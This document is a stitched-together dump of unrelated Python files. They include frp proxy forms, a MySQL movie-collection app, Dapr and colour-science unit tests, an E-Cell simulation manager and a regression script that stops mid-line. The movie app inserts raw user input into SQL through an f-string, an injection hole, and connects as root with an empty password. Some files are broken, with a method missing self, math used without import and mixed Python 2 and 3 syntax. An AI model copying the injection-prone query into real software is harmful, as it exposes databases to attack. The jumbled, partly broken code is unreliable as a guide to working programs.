tcp_mux = StringField(u'tcp_mux:') # true login_fail_exit = StringField(u'登录失败退出:') # true protocol = StringField(u'传输协议:') # tcp start = StringField(u'启用的代理:') # ssh,dns heartbeat_interval = StringField(u'心跳间隔:') # 30 heartbeat_timeout = StringField(u'心跳超时时间:') # 90 submit = SubmitField('添加') class TCPForm(localproxybaseForm): remote_port = StringField(u'远程服务器端口:') # 6001 submit = SubmitField('添加') class UDPForm(localproxybaseForm): remote_port = StringField(u'远程服务器端口:') # 6002 submit = SubmitField('添加') class HTTPForm(localproxybaseForm): http_user = StringField(u'http用户名:') # admin http_pwd = StringField(u'http密码:') # admin subdomain = StringField(u'子域:') # web01 custom_domains = StringField(u'域名:') # web02.yourdomain.com locations = StringField(u'路径:') # /, / pic host_header_rewrite = StringField(u'头部重写:') # example.com submit = SubmitField('添加') class HTTPSForm(localproxybaseForm): subdomain = StringField(u'子域名:') # web01 custom_domains = StringField(u'域名:') # web02.yourdomain.com submit = SubmitField('添加') class PluginUnixSocketForm(proxybaseForm): remote_port = StringField(u'远程服务器端口:') # 6003 plugin_unix_path = StringField(u'Unix socket位置:') # / var / run / docker.sock submit = SubmitField('添加') class PluginHttpForm(proxybaseForm): remote_port = StringField(u'远程服务器端口:') # 6004 plugin_http_user = StringField(u'http用户名:') # abc plugin_http_passwd = StringField(u'http密码:') # abc submit = SubmitField('添加') class stcpForm(localproxybaseForm): sk = StringField(u'校验码(sk):') # abcdefg submit = SubmitField('添加') class stcpVistorForm(proxybaseForm): server_name = StringField(u'服务器名:') # secret_tcp sk = StringField(u'校验码(sk):') # abcdefg bind_addr = StringField(u'绑定地址:') # 127.0.0.1 bind_port = StringField(u'绑定端口:') # 9000 use_encryption = BooleanField(u'是否加密:') # false use_compression = BooleanField(u'是否压缩:') # false submit = SubmitField('添加') app.py import pymysql db = pymysql.connect(host="localhost", user="root", password="", database="movies", charset="utf8mb4", cursorclass=pymysql.cursors.Cursor) cursor = db.cursor() print('Hi, welcome in the Movie Collection App!\n') menu_text = """Select what you want to do: l - See the full list of movies in the list a - Add a new movie to the list f - Find a movie in the list q - Quit\n""" menu_input = input(menu_text).lower() # Asks user what to do def add_movie(): # add movie function movie_title = input('Enter the title of the movie:\n').title() # title variable movie_director = input(f'Enter the director of {movie_title}:\n').title() # director variable movie_year = input(f'Enter the year of {movie_title}:\n') # year variable print(f"""Movie '{movie_title}' directed by {movie_director} in {movie_year} was added to the collection successfully.\n""") # Success message sql_create_query = """CREATE TABLE IF NOT EXISTS movie_list (id int PRIMARY KEY AUTO_INCREMENT, name VARCHAR (256) NOT NULL, director VARCHAR (256) NOT NULL, year INT NOT NULL);""" sql_insert_query = f"""INSERT INTO movie_list (name, director, year) VALUES ('{movie_title}','{movie_director}','{movie_year}');""" try: cursor.execute(sql_create_query) cursor.execute(sql_insert_query) db.commit() except: db.rollback() def show_movie_list(): sql_select_query = """SELECT name, director, year FROM movie_list""" cursor.execute(sql_select_query) movie_list_sql = cursor.fetchall() i = 1 print("Movie Collection: ") for movie in movie_list_sql: print(f"{i}. {movie[0]} -- {movie[1]} -- {movie[2]}") i += 1 print('\n') def is_number(s): try: float(s) return True except ValueError: return False def find_movie(): sql_select_query = """SELECT name, director, year FROM movie_list""" cursor.execute(sql_select_query) movie_list_sql = cursor.fetchall() input_find_text = """\nDo you want to find a movie using: Name (n) Director (d) Year (y) Go Back (b)\n""" user_find_input = input(input_find_text).lower() name_index = 0 director_index = 0 year_index = 0 while user_find_input != 'b': if user_find_input == 'n': name_input = input("Search for: \n").title() for movie in movie_list_sql: if name_input not in movie[0]: pass else: print(f"{name_index+1}. {movie[0]} -- {movie[1]} -- {movie[2]}") name_index += 1 if name_index == 0: print("No item found") user_find_input = input(input_find_text).lower() name_index = 0 elif user_find_input == 'd': director_input = input("Search for: \n").title() for movie in movie_list_sql: if director_input not in movie[1]: pass else: print(f"{director_index+1}. {movie[0]} -- {movie[1]} -- {movie[2]}") director_index += 1 if director_index == 0: print("No item found") user_find_input = input(input_find_text) director_index = 0 elif user_find_input == 'y': year_input = str(input("Search for: \n")) for movie in movie_list_sql: if year_input not in str(movie[2]): pass else: print(f"{year_index+1}. {movie[0]} -- {movie[1]} -- {movie[2]}") year_index += 1 if year_index == 0: print("No item found") user_find_input = input(input_find_text) year_index = 0 else: print('Unknown command. Please try again') user_find_input = input(input_find_text) # main menu loop while menu_input != 'q': # quit option if menu_input == 'l': # list option cursor.execute("""SELECT * FROM movie_list""") rows_number = len(cursor.fetchall()) if rows_number == 0: # check if collection is empty print('The collection of movies is currently empty.\n') else: show_movie_list() menu_input = input(menu_text).lower() elif menu_input == 'a': # add option add_movie() menu_input = input(menu_text).lower() elif menu_input == 'f': # find option find_movie() menu_input = input(menu_text).lower() else: print('Unknown command. Please try again') # wrong command option menu_input = input(menu_text).lower() # ask again print('Thanks for using the Movie Collection App!') # app end tests/actor/test_actor_runtime_config.py # -*- coding: utf-8 -*- """ Copyright (c) Microsoft Corporation and Dapr Contributors. Licensed under the MIT License. """ import unittest from datetime import timedelta from dapr.actor.runtime.config import ActorRuntimeConfig, ActorReentrancyConfig class ActorRuntimeConfigTests(unittest.TestCase): def test_default_config(self): config = ActorRuntimeConfig() self.assertEqual(config._actor_idle_timeout, timedelta(seconds=3600)) self.assertEqual(config._actor_scan_interval, timedelta(seconds=30)) self.assertEqual(config._drain_ongoing_call_timeout, timedelta(seconds=60)) self.assertEqual(config._drain_rebalanced_actors, True) self.assertEqual(config._reentrancy, None) self.assertEqual(config._entities, []) self.assertNotIn('reentrancy', config.as_dict().keys()) self.assertNotIn('remindersStoragePartitions', config.as_dict().keys()) def test_default_config_with_reentrancy(self): reentrancyConfig = ActorReentrancyConfig(enabled=True) config = ActorRuntimeConfig(reentrancy=reentrancyConfig) self.assertEqual(config._actor_idle_timeout, timedelta(seconds=3600)) self.assertEqual(config._actor_scan_interval, timedelta(seconds=30)) self.assertEqual(config._drain_ongoing_call_timeout, timedelta(seconds=60)) self.assertEqual(config._drain_rebalanced_actors, True) self.assertEqual(config._reentrancy, reentrancyConfig) self.assertEqual(config._entities, []) self.assertEqual(config.as_dict()['reentrancy'], reentrancyConfig.as_dict()) self.assertEqual(config.as_dict()['reentrancy']['enabled'], True) self.assertEqual(config.as_dict()['reentrancy']['maxStackDepth'], 32) self.assertNotIn('remindersStoragePartitions', config.as_dict().keys()) def test_update_entities(self): config = ActorRuntimeConfig() config.update_entities(['actortype1']) self.assertEqual(config._actor_idle_timeout, timedelta(seconds=3600)) self.assertEqual(config._actor_scan_interval, timedelta(seconds=30)) self.assertEqual(config._drain_ongoing_call_timeout, timedelta(seconds=60)) self.assertEqual(config._drain_rebalanced_actors, True) self.assertEqual(config._entities, ['actortype1']) self.assertNotIn('remindersStoragePartitions', config.as_dict().keys()) def test_update_entities_two_types(self): config = ActorRuntimeConfig() config.update_entities(['actortype1', 'actortype1']) self.assertEqual(config._actor_idle_timeout, timedelta(seconds=3600)) self.assertEqual(config._actor_scan_interval, timedelta(seconds=30)) self.assertEqual(config._drain_ongoing_call_timeout, timedelta(seconds=60)) self.assertEqual(config._drain_rebalanced_actors, True) self.assertEqual(config._entities, ['actortype1', 'actortype1']) self.assertNotIn('remindersStoragePartitions', config.as_dict().keys()) def test_set_reminders_storage_partitions(self): config = ActorRuntimeConfig(reminders_storage_partitions=12) self.assertEqual(config._actor_idle_timeout, timedelta(seconds=3600)) self.assertEqual(config._actor_scan_interval, timedelta(seconds=30)) self.assertEqual(config._drain_ongoing_call_timeout, timedelta(seconds=60)) self.assertEqual(config._drain_rebalanced_actors, True) self.assertNotIn('reentrancy', config.as_dict().keys()) self.assertEqual(config._reminders_storage_partitions, 12) self.assertEqual(config.as_dict()['remindersStoragePartitions'], 12) if __name__ == '__main__': unittest.main() # -*- encoding: utf-8 -*- import threading def func(n): for i in range(100): print(str(i) + threading.current_thread().name) t1 = threading.Thread(target=func, args=('1',)) t2 = threading.Thread(target=func, args=('2',)) threads = [] threads.append(t1) threads.append(t2) if __name__ == '__main__': for t in threads: t.setDaemon(True) t.start() t.join() print('this is a thread {}'.format(threading.current_thread().name)) # -*- coding: utf-8 -*- """ Defines unit tests for :mod:`colour.models.hdr_ipt` module. """ import numpy as np import unittest from itertools import permutations from colour.models import XYZ_to_hdr_IPT, hdr_IPT_to_XYZ from colour.models.hdr_ipt import exponent_hdr_IPT from colour.utilities import domain_range_scale, ignore_numpy_errors __author__ = 'Colour Developers' __copyright__ = 'Copyright (C) 2013-2021 - Colour Developers' __license__ = 'New BSD License - https://opensource.org/licenses/BSD-3-Clause' __maintainer__ = 'Colour Developers' __email__ = '' __status__ = 'Production' __all__ = ['TestExponent_hdr_IPT', 'TestXYZ_to_hdr_IPT', 'TestHdr_IPT_to_XYZ'] class TestExponent_hdr_IPT(unittest.TestCase): """ Defines :func:`colour.models.hdr_ipt.exponent_hdr_IPT` definition unit tests methods. """ def test_exponent_hdr_IPT(self): """ Tests :func:`colour.models.hdr_ipt.exponent_hdr_IPT` definition. """ self.assertAlmostEqual( exponent_hdr_IPT(0.2, 100), 0.482020919845900, places=7) self.assertAlmostEqual( exponent_hdr_IPT(0.4, 100), 0.667413581325092, places=7) self.assertAlmostEqual( exponent_hdr_IPT(0.4, 100, method='Fairchild 2010'), 1.219933220992410, places=7) self.assertAlmostEqual( exponent_hdr_IPT(0.2, 1000), 0.723031379768850, places=7) def test_n_dimensional_exponent_hdr_IPT(self): """ Tests :func:`colour.models.hdr_ipt.exponent_hdr_IPT` definition n-dimensional arrays support. """ Y_s = 0.2 Y_abs = 100 epsilon = exponent_hdr_IPT(Y_s, Y_abs) Y_s = np.tile(Y_s, 6) Y_abs = np.tile(Y_abs, 6) epsilon = np.tile(epsilon, 6) np.testing.assert_almost_equal( exponent_hdr_IPT(Y_s, Y_abs), epsilon, decimal=7) Y_s = np.reshape(Y_s, (2, 3)) Y_abs = np.reshape(Y_abs, (2, 3)) epsilon = np.reshape(epsilon, (2, 3)) np.testing.assert_almost_equal( exponent_hdr_IPT(Y_s, Y_abs), epsilon, decimal=7) Y_s = np.reshape(Y_s, (2, 3, 1)) Y_abs = np.reshape(Y_abs, (2, 3, 1)) epsilon = np.reshape(epsilon, (2, 3, 1)) np.testing.assert_almost_equal( exponent_hdr_IPT(Y_s, Y_abs), epsilon, decimal=7) def test_domain_range_scale_exponent_hdr_IPT(self): """ Tests :func:`colour.models.hdr_ipt.exponent_hdr_IPT` definition domain and range scale support. """ Y_s = 0.2 Y_abs = 100 epsilon = exponent_hdr_IPT(Y_s, Y_abs) d_r = (('reference', 1), (1, 1), (100, 100)) for scale, factor in d_r: with domain_range_scale(scale): np.testing.assert_almost_equal( exponent_hdr_IPT(Y_s * factor, Y_abs), epsilon, decimal=7) @ignore_numpy_errors def test_nan_exponent_hdr_IPT(self): """ Tests :func:`colour.models.hdr_ipt.exponent_hdr_IPT` definition nan support. """ cases = np.array([-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan]) exponent_hdr_IPT(cases, cases) class TestXYZ_to_hdr_IPT(unittest.TestCase): """ Defines :func:`colour.models.hdr_ipt.XYZ_to_hdr_IPT` definition unit tests methods. """ def test_XYZ_to_hdr_IPT(self): """ Tests :func:`colour.models.hdr_ipt.XYZ_to_hdr_IPT` definition. """ np.testing.assert_almost_equal( XYZ_to_hdr_IPT(np.array([0.20654008, 0.12197225, 0.05136952])), np.array([48.39376346, 42.44990202, 22.01954033]), decimal=7) np.testing.assert_almost_equal( XYZ_to_hdr_IPT( np.array([0.20654008, 0.12197225, 0.05136952]), method='Fairchild 2010'), np.array([30.02873147, 83.93845061, 34.90287382]), decimal=7) np.testing.assert_almost_equal( XYZ_to_hdr_IPT( np.array([0.20654008, 0.12197225, 0.05136952]), Y_s=0.5), np.array([20.75088680, 37.98300971, 16.66974299]), decimal=7) np.testing.assert_almost_equal( XYZ_to_hdr_IPT( np.array([0.07818780, 0.06157201, 0.28099326]), Y_abs=1000), np.array([23.83205010, -5.98739209, -32.74311745]), decimal=7) def test_n_dimensional_XYZ_to_hdr_IPT(self): """ Tests :func:`colour.models.hdr_ipt.XYZ_to_hdr_IPT` definition n-dimensional support. """ XYZ = np.array([0.20654008, 0.12197225, 0.05136952]) Y_s = 0.2 Y_abs = 100 IPT_hdr = XYZ_to_hdr_IPT(XYZ, Y_s, Y_abs) XYZ = np.tile(XYZ, (6, 1)) IPT_hdr = np.tile(IPT_hdr, (6, 1)) np.testing.assert_almost_equal( XYZ_to_hdr_IPT(XYZ, Y_s, Y_abs), IPT_hdr, decimal=7) Y_s = np.tile(Y_s, 6) Y_abs = np.tile(Y_abs, 6) np.testing.assert_almost_equal( XYZ_to_hdr_IPT(XYZ, Y_s, Y_abs), IPT_hdr, decimal=7) XYZ = np.reshape(XYZ, (2, 3, 3)) Y_s = np.reshape(Y_s, (2, 3)) Y_abs = np.reshape(Y_abs, (2, 3)) IPT_hdr = np.reshape(IPT_hdr, (2, 3, 3)) np.testing.assert_almost_equal( XYZ_to_hdr_IPT(XYZ, Y_s, Y_abs), IPT_hdr, decimal=7) def test_domain_range_scale_XYZ_to_hdr_IPT(self): """ Tests :func:`colour.models.hdr_ipt.XYZ_to_hdr_IPT` definition domain and range scale support. """ XYZ = np.array([0.20654008, 0.12197225, 0.05136952]) Y_s = 0.2 Y_abs = 100 IPT_hdr = XYZ_to_hdr_IPT(XYZ, Y_s, Y_abs) d_r = (('reference', 1, 1), (1, 1, 0.01), (100, 100, 1)) for scale, factor_a, factor_b in d_r: with domain_range_scale(scale): np.testing.assert_almost_equal( XYZ_to_hdr_IPT(XYZ * factor_a, Y_s * factor_a, Y_abs), IPT_hdr * factor_b, decimal=7) @ignore_numpy_errors def test_nan_XYZ_to_hdr_IPT(self): """ Tests :func:`colour.models.hdr_ipt.XYZ_to_hdr_IPT` definition nan support. """ cases = [-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan] cases = set(permutations(cases * 3, r=3)) for case in cases: XYZ = np.array(case) Y_s = case[0] Y_abs = case[0] XYZ_to_hdr_IPT(XYZ, Y_s, Y_abs) class TestHdr_IPT_to_XYZ(unittest.TestCase): """ Defines :func:`colour.models.hdr_ipt.hdr_IPT_to_XYZ` definition unit tests methods. """ def test_hdr_IPT_to_XYZ(self): """ Tests :func:`colour.models.hdr_ipt.hdr_IPT_to_XYZ` definition. """ np.testing.assert_almost_equal( hdr_IPT_to_XYZ(np.array([48.39376346, 42.44990202, 22.01954033])), np.array([0.20654008, 0.12197225, 0.05136952]), decimal=7) np.testing.assert_almost_equal( hdr_IPT_to_XYZ( np.array([30.02873147, 83.93845061, 34.90287382]), method='Fairchild 2010'), np.array([0.20654008, 0.12197225, 0.05136952]), decimal=7) np.testing.assert_almost_equal( hdr_IPT_to_XYZ( np.array([20.75088680, 37.98300971, 16.66974299]), Y_s=0.5), np.array([0.20654008, 0.12197225, 0.05136952]), decimal=7) np.testing.assert_almost_equal( hdr_IPT_to_XYZ( np.array([23.83205010, -5.98739209, -32.74311745]), Y_abs=1000), np.array([0.07818780, 0.06157201, 0.28099326]), decimal=7) def test_n_dimensional_hdr_IPT_to_XYZ(self): """ Tests :func:`colour.models.hdr_ipt.hdr_IPT_to_XYZ` definition n-dimensional support. """ IPT_hdr = np.array([48.39376346, 42.44990202, 22.01954033]) Y_s = 0.2 Y_abs = 100 XYZ = hdr_IPT_to_XYZ(IPT_hdr, Y_s, Y_abs) IPT_hdr = np.tile(IPT_hdr, (6, 1)) XYZ = np.tile(XYZ, (6, 1)) np.testing.assert_almost_equal( hdr_IPT_to_XYZ(IPT_hdr, Y_s, Y_abs), XYZ, decimal=7) Y_s = np.tile(Y_s, 6) Y_abs = np.tile(Y_abs, 6) np.testing.assert_almost_equal( hdr_IPT_to_XYZ(IPT_hdr, Y_s, Y_abs), XYZ, decimal=7) IPT_hdr = np.reshape(IPT_hdr, (2, 3, 3)) Y_s = np.reshape(Y_s, (2, 3)) Y_abs = np.reshape(Y_abs, (2, 3)) XYZ = np.reshape(XYZ, (2, 3, 3)) np.testing.assert_almost_equal( hdr_IPT_to_XYZ(IPT_hdr, Y_s, Y_abs), XYZ, decimal=7) def test_domain_range_scale_hdr_IPT_to_XYZ(self): """ Tests :func:`colour.models.hdr_ipt.hdr_IPT_to_XYZ` definition domain and range scale support. """ IPT_hdr = np.array([24.88927680, -11.44574144, 1.63147707]) Y_s = 0.2 Y_abs = 100 XYZ = hdr_IPT_to_XYZ(IPT_hdr, Y_s, Y_abs) d_r = (('reference', 1, 1, 1), (1, 0.01, 1, 1), (100, 1, 100, 100)) for scale, factor_a, factor_b, factor_c in d_r: with domain_range_scale(scale): np.testing.assert_almost_equal( hdr_IPT_to_XYZ(IPT_hdr * factor_a, Y_s * factor_b, Y_abs), XYZ * factor_c, decimal=7) @ignore_numpy_errors def test_nan_hdr_IPT_to_XYZ(self): """ Tests :func:`colour.models.hdr_ipt.hdr_IPT_to_XYZ` definition nan support. """ cases = [-1.0, 0.0, 1.0, -np.inf, np.inf, np.nan] cases = set(permutations(cases * 3, r=3)) for case in cases: IPT_hdr = np.array(case) Y_s = case[0] Y_abs = case[0] hdr_IPT_to_XYZ(IPT_hdr, Y_s, Y_abs) if __name__ == '__main__': unittest.main() 1-10 # @name queues.py # @ref https://classroom.udacity.com/courses/ud513/lessons/7117335401/concepts/78875255560923 # @ref https://docs.python.org/3/library/collections.html # deque - list-like container with fast appends and pops on either end """ @ref https://docs.python.org/3/library/collections.html#collections.deque Returns new deque object initialized left-to-right( using append()) with data from iterable. If iterable not specified, new deque empty Deques support thread-safe, memory efficient appends, pops from either side of deque, O(1) in either direction. Deque vs. list. List optimized for fast fixed-length operations, incur O(N) memory movement costs for pop(0) and insert(0, v) operations, which change both size and position of underlying data representation. """ from collections import deque # @ref https://classroom.udacity.com/courses/ud513/lessons/7117335401/concepts/78875255560923 # deque as a queue # d.appendleft(8) is the "push" to d.pop() # d.pop() class Queue: def __init__(self, head=None): self.storage = [head] def enqueue(self, new_element): self.storage.append(new_element) pass def peek(self): return self.storage[0] pass def dequeue(self): return self.storage.pop(0) 1-10 from django.utils import timezone from know_me import models from know_me.serializers import subscription_serializers from test_utils import serialized_time def test_serialize(): """ Serializing an Apple receipt should return an overview of the information contained in the receipt. """ receipt = models.AppleReceipt(expiration_time=timezone.now()) serializer = subscription_serializers.AppleReceiptInfoSerializer(receipt) assert serializer.data == { "expiration_time": serialized_time(receipt.expiration_time) } 1-10 from .ioloop import IOLoop, time DEFAULT_SAMPLE_INTERVAL = 0.05 def wait_for_many_results(results, **kwargs): ioloop = IOLoop() results = dict((result, None) for result in results) for result in results.keys(): result.register_to_ioloop(ioloop) timeout = kwargs.pop('timeout', None) deadline = _get_deadline(results.keys(), timeout) # Note that the _should_still_wait predicate might return False if # things happen real quickly while True: current_time = time() ioloop.do_iteration(_get_wait_interval(current_time, deadline)) _sweep_finished_results(results, ioloop) if not _should_still_wait(results, deadline=deadline): break _sweep_finished_results(results, ioloop) return list(results.values()) def flush(result): ioloop = IOLoop() result.register_to_ioloop(ioloop) ioloop.flush() def _get_deadline(results, timeout=None): """ returns the earliest deadline point in time """ start_time = time() all_deadlines = set(result.get_deadline() for result in results) all_deadlines.discard(None) if timeout is not None: all_deadlines.add(start_time + timeout) return min(all_deadlines) if all_deadlines else None def _get_wait_interval(current_time, deadline): if deadline is None: return DEFAULT_SAMPLE_INTERVAL return max(0, min(DEFAULT_SAMPLE_INTERVAL, (deadline - current_time))) def _sweep_finished_results(results, ioloop): for result in results.keys(): if results[result] is not None: continue # we unregister and re-register, because when is_finished returns True, the pipes are flushed and closed result.unregister_from_ioloop(ioloop) if result.is_finished(): results[result] = result result.register_to_ioloop(ioloop) def _should_still_wait(results, deadline): if all(r is not None for r in results.values()): return False if deadline is not None and deadline < time(): return False return True import re import csv fh=open("dataset.csv","r") # The delimiter in the csv file is '+' instead of comma. This was done to compromise with the commas in the sentence in the sentence of the dataset used. reader = csv.reader(fh, delimiter='+') #print(reader) # It is the dictionary that has the data : { label(positive/negative) : { word : count of number of occurences of the word } } dataset={} # It is the dictionary that keeps the count of records that are labeled a label l for each label l # That is, { label l : No. of records that are labeled l } no_of_items={} # This is the dictionary that contains the count of the occurences of word under each label # That is, { word : { label l : count of the occurence of word with label l } } feature_set={} # For each sentence in dataset for row in reader: # Initialize the label in the dictionary if not present already no_of_items.setdefault(row[1],0) # Increase the count of occurence of label by 1 for every occurence no_of_items[row[1]]+=1 # Initialize the dictionary for a label if not present dataset.setdefault(row[1],{}) # Split the sentence with respect to non-characters, and donot split if apostophe is present split_data=re.split('[^a-zA-Z\']',row[0]) # For every word in split data for i in split_data: # Removing stop words to a small extent by ignoring words with length less than 3 if len(i) > 2: # Initialize the word count in dataset dataset[row[1]].setdefault(i.lower(),0) # Increase the word count on its occurence with label row[1] dataset[row[1]][i.lower()]+=1 # Initialze a dictionary for a newly found word in feature set feature_set.setdefault(i.lower(),{}) # If the label was found for the word, for the first time, initialize corresponding count value for word as key feature_set[i.lower()].setdefault(row[1],0) # Increment the count for the word in that label feature_set[i.lower()][row[1]]+=1 0 # Author # Fri Jan 30 15:57:01 GMT 2009 import ecell.Session as Session #import mySession as Session import ecell.ecs import ecell.config import ecell.emc import os import numpy from sumatra.external.NeuroTools import parameters class EcellManager(): """Control and instatiate the ecell simulator embedding it in an handy python object""" def __init__(self, filename=None): ecell.ecs.setDMSearchPath( os.pathsep.join( ecell.config.dm_path ) ) self.sim = ecell.emc.Simulator() if ecell.config.version < '3.2.0': self.ses = Session.Session(self.sim, changeDirectory=False) else: self.ses = Session.Session(self.sim) # Load the model self.ses.loadModel(filename) self.molToTrack = ('ca', 'moles_bound_ca_per_moles_cam', 'Rbar', 'PP2Bbar', 'CaMKIIbar', 'PP1abar', # Active PP1/Total PP1 'AMPAR', # 'AMPAR_P', 'D', 'totDp', 'Dpbar' ) # Tracking the calcium self.ca = self.ses.createEntityStub( 'Variable:/Spine:ca' ) self.CaMKIIbar = self.ses.createEntityStub( 'Variable:/Spine:CaMKIIbar' ) self.ampar_P = self.ses.createEntityStub('Variable:/Spine:AMPAR_P') self.ca_in = self.ses.createEntityStub('Process:/Spine:ca_in') self.ca_leak = self.ses.createEntityStub('Process:/Spine:ca_leak') self.ca_pump = self.ses.createEntityStub('Process:/Spine:ca_pump') def createLoggers(self): """Create the logger to track the species""" loggers = {} #log = ecell.LoggerStub() for mol in self.molToTrack: loggers[mol] = self.ses.createLoggerStub( "Variable:/Spine:" + mol + ":Value" ) loggers[mol].create() # This creat the Logger Object in the backend if mol == 'ca': loggers['ca_conc'] = self.ses.createLoggerStub( "Variable:/Spine:" + mol + ":MolarConc" ) loggers['ca_conc'].create() # This creat the Logger Object in the backend self.loggers = loggers def calcWeight(CaMKIIbar, PP2Bbar, alpha, beta, n=3, k=0.5): """Calc the weight of the synapses according to the CaMKII and Pospahtases PP2B and PP1""" # CaMKII term CaMKII_factor = math.pow(CaMKIIbar, n) / (math.pow(k, n) + math.pow(CaMKIIbar, n)) Phosphatase_factor = math.pow(PP2Bbar, n) / (math.pow(k, n) + math.pow(PP2Bbar, n)) scaled_CaMKII_factor = alpha * CaMKII_factor scaled_Phospatese_factor = beta * Phosphatase_factor weight = 1 + scaled_CaMKII_factor - scaled_Phospatese_factor s = "Weight: %s CaMKII factor %s, Phosphatase factor %s" %(weight, scaled_CaMKII_factor, scaled_Phospatese_factor) return weight def calcium_peak(self, k_value, duration): """ Mimic the calcium peak :Parameters k_value: the rate of calcium to enter duration: Duration of the spike """ basal = self.ca_in['k'] self.ca_in['k'] = k_value self.ses.run(duration) self.ca_in['k'] = basal def calciumTrain(self, spikes=30, interval=0.1): """Create a train of calcium with the specified number of spikes and interval :Parameter spikes: number of spikes interval: Interval between spikes """ for i in range(spikes): self.calcium_peak(4.0e8, # Magic number from Lu 0.00001 #Really fast spike to avoid the overlap ) self.ses.run(interval) def converToTimeCourses(self): timeCourses = {} for key in self.loggers: timeCourses[key] = self.loggers[key].getData() self.timeCourses = timeCourses ############################################## # Testing method def testCalciumTrain(spikes_number, interval, filename): """Run a test simulation wit a train of calcium input""" print "Test the results of a train of calcium""" ecellManager = EcellManager(filename) ecellManager.createLoggers() #ecellManager.ca_in = ecellManager.ses.createEntityStub('Process:/Spine:ca_in') print "Model loaded, loggers created. Integration start." ecellManager.ses.run(300) print "Calcium Train" ecellManager.calciumTrain(spikes=spikes_number, interval=interval) ecellManager.ses.run(400) ecellManager.converToTimeCourses() print "CalciumTrain Test Concluded\n##################" return ecellManager def testChangeCalciumValue(interval, caValue, filename="../biochemical_circuits/biomd183_noCalcium.eml"): """Run a test simulation changing the calcium value on the fly""" print "Show case of the possibilities to change the level of calcium on the fly" ecellManager = EcellManager(filename) ecellManager.createLoggers() print "Loggers created" print "Running with the updating interval of : %f" %interval tstop = 150 while(ecellManager.ses.getCurrentTime() < tstop): ecellManager.ca['Value'] = caValue ecellManager.ses.run(interval) #ecellManager.ses.run(1) #print ecellManager.ses.getCurrentTime() print "immision of Calcium" print "Value of Calcium %f" %ecellManager.ca.getProperty('Value') spikes = 4 for i in range(spikes): ecellManager.ca['Value'] = 7200 ecellManager.ses.run(0.020) ecellManager.ca['Value'] = caValue ecellManager.ses.run(0.010) tstop = tstop+500 while(ecellManager.ses.getCurrentTime() < tstop): ecellManager.ca['Value'] = caValue ecellManager.ses.run(interval) #ecellManager.ses.run(1) #print ecellManager.ses.getCurrentTime() ecellManager.converToTimeCourses() print "ChangeCalciumValue Test Concluded" return ecellManager if __name__ == "__main__": import sys if len(sys.argv) != 2: print("No parameter file supplied. Abort.") usage = 'python ecellManager.py ecellControl.param' print usage sys.exit() parameter_file = sys.argv[1] param = parameters.ParameterSet(parameter_file) ## Setting the mat plotlib backend import matplotlib if param['interactive'] == False: matplotlib.use('Agg') print "Switching backend to Agg. Batch execution" import matplotlib.pyplot as plt from helpers.plotter import EcellPlotter import helpers loader = helpers.Loader() # ecellManager = testChangeCalciumValue(interval, caValue) if param['running_type'] == 'train': ecellManager = testCalciumTrain(param['num_spikes'], param['delay'], param['biochemical_filename']) ecp = EcellPlotter() if param['interactive'] == False: dir = loader.create_new_dir(prefix=os.getcwd()) loader.save(ecellManager.timeCourses, dir, "timeCourses") ecp.plot_timeCourses(ecellManager.timeCourses, save=True, dir=dir) ecp.plot_weight(ecellManager.timeCourses, dir=dir) else: ecp.plot_timeCourses(ecellManager.timeCourses) ecp.plot_weight(ecellManager.timeCourses) plt.show() # Copyright 2013-2022 Lawrence Livermore National Security, LLC and other # Spack Project Developers. See the top-level COPYRIGHT file for details. # # SPDX-License-Identifier: (Apache-2.0 OR MIT) from spack import * class RGitcreds(RPackage): """Query 'git' Credentials from 'R'. Query, set, delete credentials from the 'git' credential store. Manage 'GitHub' tokens and other 'git' credentials. This package is to be used by other packages that need to authenticate to 'GitHub' and/or other 'git' repositories.""" cran = "gitcreds" version('0.1.1', sha256='b14aaf4e910a9d2d6c65c93e645f0b0159c00898e669f917f83c03dfedb1dfea') depends_on('git', type='run') 0 import pandas as pd import numpy as np from matplotlib import pyplot as plt from sklearn import preprocessing, metrics from sklearn.linear_model import LinearRegression, Ridge, Lasso from itertools import combinations ridge_alpha = 100 # Ridge regression parameter lasso_alpha = 0.001 # Lasso regression parameter # Normalize a column def norm(df: pd.DataFrame, column_to_normalize: str): temp_col = df[column_to_normalize].values.astype(float) min_max_scalar = preprocessing.MinMaxScaler() temp_col_scaled = min_max_scalar.fit_transform(temp_col.reshape(-1, 1)) temp_df = pd.DataFrame(temp_col_scaled) df[column_to_normalize] = temp_df return df # Importing the data df_Xtrain = pd.read_csv("./data/Xtrain.csv") df_Xtest = pd.read_csv("./data/Xtest.csv") df_Xtrain.drop(columns=['Unnamed: 0'], axis=1, inplace=True) df_Xtest.drop(columns=['Unnamed: 0'], axis=1, inplace=True) # Data normalization (NVP column needs normalization) df_Xtrain = norm(df_Xtrain, 'NVP') df_Xtest = norm(df_Xtest, 'NVP') # Show top 10 rows of dataframe print(df_Xtrain.head(10)) # Dataset description print(df_Xtrain.describe()) # Split X columns and Y column X_train = df_Xtrain.drop(columns=['NVP']).values Y_train = df_Xtrain['NVP'] X_test = df_Xtest.drop(columns=['NVP']).values Y_test = df_Xtest['NVP'] print('X_train shape: {} and Y_train shape: {}'.format(X_train.shape, Y_train.shape)) print('X_test shape: {} and Y_test shape: {}'.format(X_test.shape, Y_test.shape)) # training part for Multivariate linear regression regressor = LinearRegression() regressor.fit(X_train, Y_train) # Find coefficients coeff_df = pd.DataFrame(regressor.coef_, list(df_Xtrain.columns)[1:], columns=['Coefficient']) # print(coeff_df) # Prediction matters! Y_pred = regressor.predict(X_test) # Analysis of predictions df_compare = pd.DataFrame({'Actual': Y_test, 'Multivariate_Regression': Y_pred}) # print(df_compare.head(20)) # Errors and score print('\n', 'Multivariate linear regression model', '\n') print('Number of used coefficients:', np.sum(regressor.coef_ != 0)) print('R squared Score:', regressor.score(X_test, Y_test)) print('Mean Absolute Error:', metrics.mean_absolute_error(Y_test, Y_pred)) print('Mean Squared Error:', metrics.mean_squared_error(Y_test, Y_pred)) print('Root Mean Squared Error:', np.sqrt(metrics.mean_squared_error(Y_test, Y_pred))) # Training part for Ridge regression rr = Ridge(alpha=ridge_alpha) rr.fit(X_train, Y_train) # Ridge model evaluation Y_pred_ridge = rr.predict(X_test) df_compare['ridge'] = Y_pred_ridge # Errors and score print('\n', 'Ridge regression model', '\n') print('Number of used coefficients:', np.sum(rr.coef_ != 0)) print('R squared test Score:', rr.score(X_test, Y_test)) print('Mean Absolute Error:', metrics.mean_absolute_error(Y_test, Y_pred_ridge)) print('Mean Squared Error:', metrics.mean_squared_error(Y_test, 